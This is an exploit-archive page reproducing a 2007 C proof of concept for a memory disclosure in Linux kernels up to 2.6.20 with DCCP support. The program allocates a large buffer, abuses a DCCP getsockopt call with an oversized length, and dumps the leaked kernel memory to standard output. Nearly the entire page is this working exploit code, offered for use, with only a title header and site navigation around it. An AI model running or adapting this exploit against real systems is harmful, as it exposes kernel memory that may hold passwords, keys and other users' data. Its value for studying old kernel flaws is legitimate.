Linux Kernel <= 2.6.20 with DCCP Support Memory Disclosure Exploit v2

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Linux Kernel <= 2.6.20 with DCCP Support Memory Disclosure Exploit v2
# Published : 2007-03-28
# Author : Robert Swiecki
# Previous Title : Corel Wordperfect X3 13.0.0.565 (.PRS) Local Buffer Overflow Exploit
# Next Title : MS Windows Animated Cursor (.ANI) Stack Overflow Exploit

#include <netinet/in.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <net/if.h>
#include <sys/mman.h>
#include <linux/net.h>

#define BUFSIZE 0x10000000

int main(int argc, char *argv[])
{
    void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE,
               MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
    if (mem == (void*)-1) {
       printf("Alloc failedn");
       return -1;
    }
    /* SOCK_DCCP, IPPROTO_DCCP */
    int s = socket(PF_INET, 6, 33);
    if (s == -1) {
       fprintf(stderr, "socket failure!n");
       return 1;
    }
   /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */
    int len = BUFSIZE;
    int x = getsockopt(s, 269, 11, mem, &len);

    if (x == -1)
       perror("SETSOCKOPT");
    else
       printf("SUCCESSn");

    write(1, mem, BUFSIZE);

    return 0;
}

// www.Syue.com [2007-03-28]